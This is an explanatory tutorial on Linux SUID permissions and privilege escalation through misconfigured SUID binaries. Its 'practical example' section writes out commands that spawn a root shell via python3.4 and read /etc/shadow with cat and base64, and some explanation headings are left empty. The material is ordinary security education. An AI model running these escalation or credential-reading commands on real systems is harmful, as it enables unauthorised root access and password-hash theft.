SUID Binary Exploits

What is SUID?

SUID (Set User ID) is a special permission in Linux that is given to an executable file. When a file has SUID permission set, it allows a user to run that file with the permissions of the file's owner.

The owner of the file is often root (the system administrator), which means if a file is owned by root and has the SUID bit set, any user running the file will get root permissions to execute that file.

This means that even if a user is a regular user with no special privileges, by running a SUID file, they get access to root (administrator) privileges for that specific file execution.

How to Check and Set SUID Permissions

To check if a file has the SUID bit set, you can use the following command:

$ ls -l

This will list the file's details, and if the file has the SUID bit set, you will see an "s" in the owner's execute position of the file's permissions (like: -rwsr-xr-x).

How to Set and Remove the SUID Bit

If you want to set or remove the SUID permission for a file, you can use the chmod command:

To set the SUID bit:

$ sudo chmod u+s

In this command:

For example, to set the SUID bit for a file called example.sh, you would use:

$ sudo chmod u+s example.sh

To remove the SUID bit:

$ sudo chmod u-s

In this command:

For example, to remove the SUID bit from example.sh, you would use:

$ sudo chmod u-s example.sh

How to Identify SUID Binaries

$ find / -type f -perm -4000 2>/dev/null

This command will list all files with the SUID bit set on your system.

Breaking Down the Find Command

The following command is used to find files with the SUID bit set:

$ find / -type f -perm -4000 2>/dev/null

Explanation of the Command:

So, the entire command will search for files with the SUID bit set in the whole system and ignore any errors that occur due to restricted access.

Why Are They Dangerous?

If a SUID binary has a security vulnerability or flaw, an attacker could exploit it to gain root access. This is why SUID binaries need to be carefully managed and secured to prevent malicious use.

Practical Example: Exploiting SUID Binaries

Let's go through a real example to understand how SUID binaries can be dangerous if misconfigured.

Finding SUID Binaries

To find all files with the SUID bit set, run the following command:

$ find / -type f -perm -4000 2>/dev/null
List of SUID Binaries

This will list SUID files like /usr/bin/python3.4, /bin/cat, and /usr/bin/base64.

Exploiting /usr/bin/python3.4

If python3.4 is a SUID binary and owned by root, we can use it to spawn a root shell: 

$ /usr/bin/python3.4 -c 'import os; os.execl("/bin/sh", "sh")'

Once executed, you can confirm you have root access by running:

# whoami
root

Exploiting /bin/cat

The cat command can't spawn a shell, but since it's SUID, it can read protected files. For example:

$ cat /etc/shadow

Exploiting /usr/bin/base64

As shown above, /usr/bin/base64 is a SUID binary. According to GTFOBins, it can be used to read files like this:

$ /usr/bin/base64 /etc/shadow

This will output the contents in base64. You can decode it using:

$ /usr/bin/base64 /etc/shadow | base64 -d
GTFOBins base64 example

As shown in the GTFOBins screenshot above, you can use base64 to read any file if it runs with elevated privileges.

What is GTFOBins?

GTFOBins is a curated list of Unix binaries that can be exploited when misconfigured (e.g., with SUID or sudo). These can allow:

Visit https://gtfobins.github.io/ to explore more.

Conclusion

This example demonstrates how misconfigured SUID binaries like python3.4 can give attackers root access, while others like cat may still leak sensitive data. Always audit and secure SUID binaries to protect your system.